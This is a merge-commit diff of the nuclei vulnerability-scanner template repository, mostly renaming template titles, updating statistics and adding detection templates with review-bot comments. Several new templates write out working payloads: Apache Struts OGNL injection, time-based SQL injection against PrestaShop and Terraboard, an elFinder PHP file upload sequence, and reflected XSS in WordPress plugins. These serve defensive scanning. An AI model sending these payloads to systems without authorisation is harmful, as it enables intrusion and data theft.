Merge branch 'projectdiscovery:master' into wordpress-plugins

patch-1
Ricardo Maia 2022-12-06 06:29:05 -03:00 committed by GitHub
commit 75e38ef4e8
304 changed files with 6111 additions and 2541 deletions


@ -1,3 +0,0 @@
exposed-panels/fastpanel-hosting-control-panel.yaml
technologies/payara-micro-server-detect.yaml
token-spray/api-giphy.yaml


@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1538 | dhiyaneshdk | 692 | cves | 1516 | info | 1631 | http | 4257 |
| panel | 755 | daffainfo | 662 | exposed-panels | 757 | high | 1141 | file | 78 |
| edb | 578 | pikpikcu | 340 | vulnerabilities | 518 | medium | 829 | network | 73 |
| xss | 537 | pdteam | 274 | misconfiguration | 350 | critical | 546 | dns | 17 |
| exposure | 536 | geeknik | 197 | technologies | 311 | low | 269 | | |
| lfi | 519 | dwisiswant0 | 171 | exposures | 301 | unknown | 25 | | |
| wordpress | 465 | 0x_akoko | 170 | token-spray | 235 | | | | |
| cve2021 | 366 | pussycat0x | 168 | workflows | 190 | | | | |
| wp-plugin | 360 | ritikchaddha | 161 | default-logins | 114 | | | | |
| tech | 349 | princechaddha | 153 | file | 78 | | | | |
| cve | 1551 | dhiyaneshdk | 701 | cves | 1528 | info | 1666 | http | 4323 |
| panel | 778 | daffainfo | 662 | exposed-panels | 780 | high | 1152 | file | 78 |
| edb | 582 | pikpikcu | 344 | vulnerabilities | 519 | medium | 835 | network | 77 |
| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
| xss | 541 | geeknik | 206 | technologies | 319 | low | 281 | | |
| lfi | 519 | dwisiswant0 | 171 | exposures | 308 | unknown | 25 | | |
| wordpress | 470 | pussycat0x | 171 | token-spray | 236 | | | | |
| cve2021 | 369 | 0x_akoko | 170 | workflows | 190 | | | | |
| wp-plugin | 365 | ritikchaddha | 163 | default-logins | 116 | | | | |
| tech | 357 | princechaddha | 153 | file | 78 | | | | |
**314 directories, 4660 files**.
**321 directories, 4733 files**.
</td>
</tr>




@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1538 | dhiyaneshdk | 692 | cves | 1516 | info | 1631 | http | 4257 |
| panel | 755 | daffainfo | 662 | exposed-panels | 757 | high | 1141 | file | 78 |
| edb | 578 | pikpikcu | 340 | vulnerabilities | 518 | medium | 829 | network | 73 |
| xss | 537 | pdteam | 274 | misconfiguration | 350 | critical | 546 | dns | 17 |
| exposure | 536 | geeknik | 197 | technologies | 311 | low | 269 | | |
| lfi | 519 | dwisiswant0 | 171 | exposures | 301 | unknown | 25 | | |
| wordpress | 465 | 0x_akoko | 170 | token-spray | 235 | | | | |
| cve2021 | 366 | pussycat0x | 168 | workflows | 190 | | | | |
| wp-plugin | 360 | ritikchaddha | 161 | default-logins | 114 | | | | |
| tech | 349 | princechaddha | 153 | file | 78 | | | | |
| cve | 1551 | dhiyaneshdk | 701 | cves | 1528 | info | 1666 | http | 4323 |
| panel | 778 | daffainfo | 662 | exposed-panels | 780 | high | 1152 | file | 78 |
| edb | 582 | pikpikcu | 344 | vulnerabilities | 519 | medium | 835 | network | 77 |
| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
| xss | 541 | geeknik | 206 | technologies | 319 | low | 281 | | |
| lfi | 519 | dwisiswant0 | 171 | exposures | 308 | unknown | 25 | | |
| wordpress | 470 | pussycat0x | 171 | token-spray | 236 | | | | |
| cve2021 | 369 | 0x_akoko | 170 | workflows | 190 | | | | |
| wp-plugin | 365 | ritikchaddha | 163 | default-logins | 116 | | | | |
| tech | 357 | princechaddha | 153 | file | 78 | | | | |


@ -1368,5 +1368,16 @@
"website": "",
"email": ""
}
},
{
"author": "heywoodlh",
"links": {
"github": "https://www.github.com/heywoodlh",
"twitter": "",
"linkedin": "",
"website": "https://the-empire.systems",
"email": ""
}
}
]


@ -13,10 +13,11 @@ info:
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2008-6982
cwe-id: CWE-79
metadata:
verified: "true"
tags: devalcms,xss,cms,edb
tags: cve,cve2008,devalcms,xss,cms,edb
requests:
- method: GET


@ -0,0 +1,39 @@
id: CVE-2012-0394
info:
name: Apache Struts Dev Mode OGNL Injection
author: tess
severity: critical
description: |
The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
reference:
- https://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/
- https://www.exploit-db.com/exploits/31434
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0394
- http://www.exploit-db.com/exploits/18329
classification:
cve-id: CVE-2012-0394
metadata:
shodan-query: html:"Struts Problem Report"
verified: "true"
tags: ognl,injection,edb,cve,cve2012,apache,struts
variables:
first: "{{rand_int(1000, 9999)}}"
second: "{{rand_int(1000, 9999)}}"
result: "{{to_number(first)*to_number(second)}}"
requests:
- method: GET
path:
- '{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}'
matchers-condition: and
matchers:
- type: word
words:
- '{{result}}'
- type: status
status:
- 200
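Review bot: The `classification` block under `cve-id: CVE-2012-0394` carries no `cvss-metrics`, `cvss-score` or `cwe-id`, unlike the other templates added in this commit (CVE-2020-26248, CVE-2021-3110 and CVE-2022-1883 fill in all four fields). Fill them from the NVD record so the `severity: critical` label can be checked against a score rather than taken on trust. The `reference` list mixes `https` and `http` forms of exploit-db; keep the `https` one.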


@ -1,7 +1,7 @@
id: CVE-2016-10033
info:
name: WordPress PHPMailer < 5.2.18 Remote Code Execution
name: WordPress PHPMailer < 5.2.18 - Remote Code Execution
author: princechaddha
severity: critical
description: WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " (backslash double quote) in a crafted Sender property in isMail transport.


@ -1,7 +1,7 @@
id: CVE-2018-14912
info:
name: cgit < 1.2.1 Directory Traversal
name: cgit < 1.2.1 - Directory Traversal
author: 0x_Akoko
severity: high
description: cGit < 1.2.1 via cgit_clone_objects has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request.


@ -1,7 +1,7 @@
id: CVE-2019-10232
info:
name: Teclib GLPI <= 9.3.3 Unauthenticated SQL Injection
name: Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection
author: RedTeamBrasil
severity: critical
description: Teclib GLPI <= 9.3.3 exposes a script (/scripts/unlock_tasks.php) that incorrectly sanitizes user controlled data before using it in SQL queries. Thus, an attacker could abuse the affected feature


@ -1,7 +1,7 @@
id: CVE-2019-12314
info:
name: Deltek Maconomy 2.2.5 Local File Inclusion
name: Deltek Maconomy 2.2.5 - Local File Inclusion
author: madrobot
severity: critical
description: Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI.


@ -1,7 +1,7 @@
id: CVE-2019-12725
info:
name: Zeroshell 3.9.0 Remote Command Execution
name: Zeroshell 3.9.0 - Remote Command Execution
author: dwisiswant0,akincibor
severity: critical
description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.


@ -1,7 +1,7 @@
id: CVE-2019-13101
info:
name: D-Link DIR-600M Authentication Bypass
name: D-Link DIR-600M - Authentication Bypass
author: Suman_Kar
severity: critical
description: D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page.


@ -1,7 +1,7 @@
id: CVE-2019-13392
info:
name: MindPalette NateMail 3.0.15 Cross-Site Scripting
name: MindPalette NateMail 3.0.15 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: MindPalette NateMail 3.0.15 is susceptible to reflected cross-site scripting which could allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request. The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid.


@ -1,7 +1,7 @@
id: CVE-2019-15107
info:
name: Webmin <= 1.920 Unauthenticated Remote Command Execution
name: Webmin <= 1.920 - Unauthenticated Remote Command Execution
author: bp0lr
severity: critical
description: Webmin <=1.920. is vulnerable to an unauthenticated remote command execution via the parameter 'old' in password_change.cgi.


@ -1,7 +1,7 @@
id: CVE-2019-16313
info:
name: ifw8 Router ROM v4.31 Credential Discovery
name: ifw8 Router ROM v4.31 - Credential Discovery
author: pikpikcu
severity: high
description: ifw8 Router ROM v4.31 is vulnerable to credential disclosure via action/usermanager.htm HTML source code.


@ -1,7 +1,7 @@
id: CVE-2019-16662
info:
name: rConfig 3.9.2 Remote Code Execution
name: rConfig 3.9.2 - Remote Code Execution
author: pikpikcu
severity: critical
description: rConfig 3.9.2 is susceptible to a remote code execution vulnerability. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution.


@ -9,7 +9,7 @@ info:
- https://www.tenable.com/security/research/tra-2019-03
- https://nvd.nist.gov/vuln/detail/CVE-2019-3911
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-3911
cwe-id: CWE-79


@ -10,7 +10,7 @@ info:
- https://www.cvedetails.com/cve/CVE-2019-3912
- https://nvd.nist.gov/vuln/detail/CVE-2019-3912
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-3912
cwe-id: CWE-601


@ -1,7 +1,7 @@
id: CVE-2020-10546
info:
name: rConfig 3.9.4 SQL Injection
name: rConfig 3.9.4 - SQL Injection
author: madrobot
severity: critical
description: rConfig 3.9.4 and previous versions have unauthenticated compliancepolicies.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement,


@ -1,7 +1,7 @@
id: CVE-2020-10547
info:
name: rConfig 3.9.4 SQL Injection
name: rConfig 3.9.4 - SQL Injection
author: madrobot
severity: critical
description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because nodes' passwords are stored by default in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.


@ -1,7 +1,7 @@
id: CVE-2020-11991
info:
name: Apache Cocoon 2.1.12 XML Injection
name: Apache Cocoon 2.1.12 - XML Injection
author: pikpikcu
severity: high
description: Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.


@ -1,7 +1,7 @@
id: CVE-2020-13700
info:
name: WordPresss acf-to-rest-api <=3.1.0- Insecure Direct Object Reference
name: WordPresss acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference
author: pikpikcu
severity: high
description: |


@ -1,7 +1,7 @@
id: CVE-2020-13937
info:
name: Apache Kylin Exposed Configuration File
name: Apache Kylin - Exposed Configuration File
author: pikpikcu
severity: medium
description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication.


@ -4,7 +4,7 @@ id: CVE-2020-25213
# http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt
info:
name: WordPress File Manager Plugin Remote Code Execution
name: WordPress File Manager Plugin - Remote Code Execution
author: foulenzer
severity: critical
description: The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files.


@ -1,7 +1,7 @@
id: CVE-2020-25223
info:
name: Sophos UTM Preauth Remote Code Execution
name: Sophos UTM Preauth - Remote Code Execution
author: gy741
severity: critical
description: Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11.


@ -1,7 +1,7 @@
id: CVE-2020-25506
info:
name: D-Link DNS-320 Unauthenticated Remote Code Execution
name: D-Link DNS-320 - Unauthenticated Remote Code Execution
author: gy741
severity: critical
description: D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution.


@ -1,7 +1,7 @@
id: CVE-2020-2551
info:
name: Oracle WebLogic Server Remote Code Execution
name: Oracle WebLogic Server - Remote Code Execution
author: dwisiswant0
severity: critical
description: |


@ -0,0 +1,37 @@
id: CVE-2020-26248
info:
name: PrestaShop ProductComments < 4.2.0 - SQL Injection
author: edoardottt
severity: high
description: |
In the PrestaShop module "productcomments" before version 4.2.1, an attacker can use a Blind SQL injection to retrieve data or stop the MySQL service. The problem is fixed in 4.2.1 of the module.
reference:
- https://packetstormsecurity.com/files/160539/PrestaShop-ProductComments-4.2.0-SQL-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-26248
- https://packagist.org/packages/prestashop/productcomments
- https://github.com/PrestaShop/productcomments/security/advisories/GHSA-5v44-7647-xfw9
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
cvss-score: 8.2
cve-id: CVE-2020-26248
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2020,sqli,prestshop,packetstorm
requests:
- raw:
- |
@timeout: 20s
GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains(body, "average_grade")'
condition: and
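Review bot: The `tags` line spells the product `prestshop`, so a run selecting templates by the tag `prestashop` will never pick this one up; CVE-2021-3110 in this commit has the same misspelling. Correct both to `prestashop`. The `name` says `< 4.2.0` while the description says the flaw is fixed in 4.2.1 and affects versions before it; align the name with the description (`< 4.2.1`) unless 4.2.0 itself is known to be unaffected.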


@ -1,7 +1,7 @@
id: CVE-2020-35729
info:
name: Klog Server <=2.41- Unauthenticated Command Injection
name: Klog Server <=2.41 - Unauthenticated Command Injection
author: dwisiswant0
severity: critical
description: Klog Server 2.4.1 and prior is susceptible to an unauthenticated command injection vulnerability. The `authenticate.php` file uses the `user` HTTP POST parameter in a call to the `shell_exec()` PHP function without appropriate input validation, allowing arbitrary command execution as the apache user. The sudo configuration permits the Apache user to execute any command as root without providing a password, resulting in privileged command execution as root. Originated from Metasploit module, copyright (c) space-r7.


@ -1,7 +1,7 @@
id: CVE-2020-35846
info:
name: Agentejo Cockpit < 0.11.2 NoSQL Injection
name: Agentejo Cockpit < 0.11.2 - NoSQL Injection
author: dwisiswant0
severity: critical
description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. The $eq operator matches documents where the value of a field equals the specified value.


@ -1,7 +1,7 @@
id: CVE-2020-35847
info:
name: Agentejo Cockpit <0.11.2 NoSQL Injection
name: Agentejo Cockpit <0.11.2 - NoSQL Injection
author: dwisiswant0
severity: critical
description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller.


@ -1,7 +1,7 @@
id: CVE-2021-20114
info:
name: TCExam <= 14.8.1 Sensitive Information Exposure
name: TCExam <= 14.8.1 - Sensitive Information Exposure
author: push4d
severity: high
description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which includes sensitive database backup files.


@ -0,0 +1,35 @@
id: CVE-2021-3110
info:
name: PrestaShop 1.7.7.0 SQL Injection
author: Jaimin Gondaliya
severity: critical
description: |
The store system in PrestaShop 1.7.7.0 allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-3110
- https://medium.com/@gondaliyajaimin797/cve-2021-3110-75a24943ca5e
- https://www.exploit-db.com/exploits/49410
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-3110
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2021,sqli,prestshop,edb
requests:
- raw:
- |
@timeout: 20s
GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains(body, "average_grade")'
condition: and
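Review bot: The `name` value `PrestaShop 1.7.7.0 SQL Injection` lacks the ` - ` separator that this same commit adds to dozens of other templates; write `name: PrestaShop 1.7.7.0 - SQL Injection`. The request and matchers are nearly identical to CVE-2020-26248 (same productcomments CommentGrade endpoint, same time-based check), so a vulnerable host will fire both; if that overlap is intended, a one-line comment cross-referencing the sibling template would stop the next maintainer from treating one as a duplicate. The `author` value contains a space while the other templates use handles; confirm that is the intended attribution.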


@ -1,7 +1,7 @@
id: CVE-2021-31682
info:
name: WebCTRL OEM <= 6.5 Cross-Site Scripting
name: WebCTRL OEM <= 6.5 - Cross-Site Scripting
author: gy741,dhiyaneshDk
severity: medium
description: WebCTRL OEM 6.5 and prior is susceptible to a cross-site scripting vulnerability because the login portal does not sanitize the operatorlocale GET parameter.


@ -16,8 +16,10 @@ info:
cve-id: CVE-2021-35587
cwe-id: CWE-502
metadata:
verified: true
fofa-query: body="/oam/pages/css/login_page.css"
tags: cve,cve2021,oam,rce,java,unauth,oracle
shodan-query: http.title:"Oracle Access Management"
tags: cve,cve2021,oam,rce,java,unauth,oracle,kev
requests:
- method: GET
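Review bot: The context line `verified: true` just above the new `shodan-query` is an unquoted boolean, while this same commit normalizes the key to the string form `verified: "true"` in CVE-2022-3484; CVE-2021-44152 (on a new line) and the new nsicg-default-login file are left unquoted too. Since this hunk already touches the metadata block, quote it here as well so the field has a single type across the repo. The nsicg template additionally declares `reference: |`, which turns its reference list into one multi-line string rather than a sequence; it should be `reference:` followed by the `- https://...` item. The request lines continue outside the hunk.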


@ -1,7 +1,7 @@
id: CVE-2021-38751
info:
name: ExponentCMS <= 2.6 Host Header Injection
name: ExponentCMS <= 2.6 - Host Header Injection
author: dwisiswant0
severity: medium
description: An HTTP Host header attack exists in ExponentCMS 2.6 and below in /exponent_constants.php. A modified HTTP header can change links on the webpage to an arbitrary value,leading to a possible attack


@ -1,7 +1,7 @@
id: CVE-2021-40438
info:
name: Apache <= 2.4.48 Mod_Proxy SSRF
name: Apache <= 2.4.48 - Mod_Proxy SSRF
author: pdteam
severity: critical
description: Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.


@ -1,7 +1,7 @@
id: CVE-2021-41174
info:
name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering Cross-Site Scripting
name: Grafana 8.0.0 <= v.8.2.2 - Angularjs Rendering Cross-Site Scripting
author: pdteam
severity: medium
description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions.


@ -0,0 +1,52 @@
id: CVE-2021-43421
info:
name: Studio-42 elFinder < 2.1.60 - Arbitrary File Upload
author: akincibor
severity: critical
description: |
A File Upload vulnerability exists in Studio-42 elFinder 2.0.4 to 2.1.59 via connector.minimal.php, which allows a remote malicious user to upload arbitrary files and execute PHP code.
reference:
- https://github.com/Studio-42/elFinder/issues/3429
- https://nvd.nist.gov/vuln/detail/CVE-2021-43421
- https://twitter.com/infosec_90/status/1455180286354919425
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-43421
cwe-id: CWE-434
metadata:
verified: "true"
tags: cve,cve2021,elfinder,upload,rce,intrusive
requests:
- raw:
- |
GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{randstr}}.php:aaa HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content={{randstr_1}} HTTP/1.1
Host: {{Hostname}}
- |
GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= HTTP/1.1
Host: {{Hostname}}
Accept: */*
req-condition: true
matchers:
- type: dsl
dsl:
- 'contains(body_3, "{{randstr_1}}")'
- "status_code == 200"
condition: and
extractors:
- type: regex
name: hash
group: 1
regex:
- '"hash"\:"(.*?)"\,'
internal: true
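Review bot: In the dsl matcher, `contains(body_3, ...)` is pinned to the third response but `status_code == 200` is unsuffixed; with `req-condition: true` the unsuffixed variable is, as far as I can tell, taken from the last response, which here happens to be the third, but `status_code_3 == 200` states the intent explicitly and will not silently shift if a request is added. The connector is requested under `/elFinder/php/` while the created file is fetched from `/elfinder/files/`; on a case-sensitive filesystem only one spelling exists, so please confirm the casing against a real install. Since the template is tagged `intrusive` and leaves `{{randstr}}.php:aaa` on the target, a final request that deletes the created file would keep the scan from leaving artifacts behind.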


@ -1,7 +1,7 @@
id: CVE-2021-43778
info:
name: GLPI plugin Barcode < 2.6.1 Path Traversal Vulnerability.
name: GLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability.
author: cckuailong
severity: high
description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability.
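Review bot: The new `name` value ends with a period and the word `Vulnerability`, which no other name in this commit carries (compare `Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection` in CVE-2019-10232). Trim it to `name: GLPI plugin Barcode < 2.6.1 - Path Traversal`. The rest of the template lies outside this hunk.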


@ -1,20 +1,25 @@
id: unauth-rlm
id: CVE-2021-44152
info:
name: Reprise License Manager 14.2 - Authentication Bypass
author: Akincibor
severity: critical
description: Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user.
description: |
Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-44152
- https://reprisesoftware.com/admin/rlm-admin-download.php?&euagree=yes
- http://packetstormsecurity.com/files/165186/Reprise-License-Manager-14.2-Unauthenticated-Password-Change.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-44152
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-44152
cwe-id: CWE-287
tags: unauth,rlm,packetstorm
metadata:
verified: true
shodan-query: http.html:"Reprise License Manager"
google-dork: inurl:"/goforms/menu"
tags: cve2021,rlm,auth-bypass,packetstorm,cve
requests:
- method: GET
@ -23,13 +28,13 @@ requests:
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "RLM Administration Commands"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/03
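Review bot: The reordered `reference` list appears to keep the NVD link both at its old first position and at the new last position; if both entries survive the merge the link is duplicated and one should go. The new `verified: true` under `metadata` is an unquoted boolean while the commit normalizes the key to `"true"` elsewhere (CVE-2022-3484), so quote it here too. The trailing `# Enhanced by mp on 2022/06/03` comment now predates a rewrite that changed the id, description, classification and tags; either refresh the stamp or drop it. The request's `path` lines lie between the two hunks and are not visible here.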


@ -1,7 +1,7 @@
id: CVE-2021-45232
info:
name: Apache APISIX Dashboard <2.10.1 API Unauthorized Access
name: Apache APISIX Dashboard <2.10.1 - API Unauthorized Access
author: Mr-xn
severity: critical
description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`, some API directly use the interface of framework `gin` thus bypassing their authentication.


@ -0,0 +1,43 @@
id: CVE-2022-1883
info:
name: Terraboard < 2.2.0 - SQL Injection
author: edoardottt
severity: high
description: |
SQL Injection in GitHub repository camptocamp/terraboard prior to 2.2.0.
reference:
- https://huntr.dev/bounties/a25d15bd-cd23-487e-85cd-587960f1b9e7/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1883
- https://github.com/camptocamp/terraboard/commit/2a5dbaac015dc0714b41a59995e24f5767f89ddc
- https://huntr.dev/bounties/a25d15bd-cd23-487e-85cd-587960f1b9e7
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-1883
cwe-id: CWE-89
tags: cve,cve2022,terraboard,sqli,huntr
requests:
- raw:
- |
@timeout: 10s
GET /api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(10))+ISNULL-- HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=5'
- type: word
part: body
words:
- '"page":'
- '"results":'
condition: and
- type: status
status:
- 200
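Review bot: The injected `pg_sleep(10)` makes a vulnerable host hold the response for ten seconds, which is exactly the `@timeout: 10s` set on the request; the client will typically abort before the body arrives, and with `matchers-condition: and` the missing `"page":` word and status 200 then fail, so the template reports nothing on precisely the targets it is written for. Raise the timeout above the delay (`@timeout: 20s`, as CVE-2020-26248 and CVE-2021-3110 in this commit do for a six-second sleep) or shorten the sleep to match the `duration>=5` threshold. The `reference` list also contains the same huntr URL twice, with and without a trailing slash; keep one (CVE-2022-3506 has the same duplicate).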


@ -0,0 +1,46 @@
id: CVE-2022-1916
info:
name: Active Products Tables for WooCommerce < 1.0.5 - Cross Site Scripting
author: Akincibor
severity: medium
description: |
The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected cross-Site Scripting.
reference:
- https://wpscan.com/vulnerability/d16a0c3d-4318-4ecd-9e65-fc4165af8808
- https://nvd.nist.gov/vuln/detail/CVE-2022-1916
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-1916
cwe-id: CWE-79
tags: wordpress,wp-plugin,xss,wpscan,cve,cve2022,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=woot_get_smth&what={%22call_action%22:%22x%22,%22more_data%22:%22\u003cscript%3Ealert(document.domain)\u003c/script%3E%22}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- type: word
part: body
words:
- 'woot-content-in-popup'
- 'woot-system'
- 'woot-table'
condition: or
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
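Review bot: The `name` writes `Cross Site Scripting` without the hyphen used by every other XSS template in this commit (`Cross-Site Scripting` in CVE-2019-13392, CVE-2021-31682 and CVE-2022-25323); CVE-2022-1933 has the same form. Change it to `name: Active Products Tables for WooCommerce < 1.0.5 - Cross-Site Scripting`. The other new templates here carry a `metadata:` block with `verified: "true"`; if this one was checked against a live install, add it, otherwise leaving it out is fine.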


@ -0,0 +1,43 @@
id: CVE-2022-1933
info:
name: CDI < 5.1.9 - Cross Site Scripting
author: Akincibor
severity: medium
description: |
The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting.
reference:
- https://wpscan.com/vulnerability/6cedb27f-6140-4cba-836f-63de98e521bf
- https://wordpress.org/plugins/collect-and-deliver-interface-for-woocommerce/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1933
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-1933
cwe-id: CWE-79
metadata:
verified: "true"
tags: cdi,wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss
requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=cdi_collect_follow&trk=%3Cscript%3Ealert(document.domain)%3C/script%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- 'Tracking code not correct'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
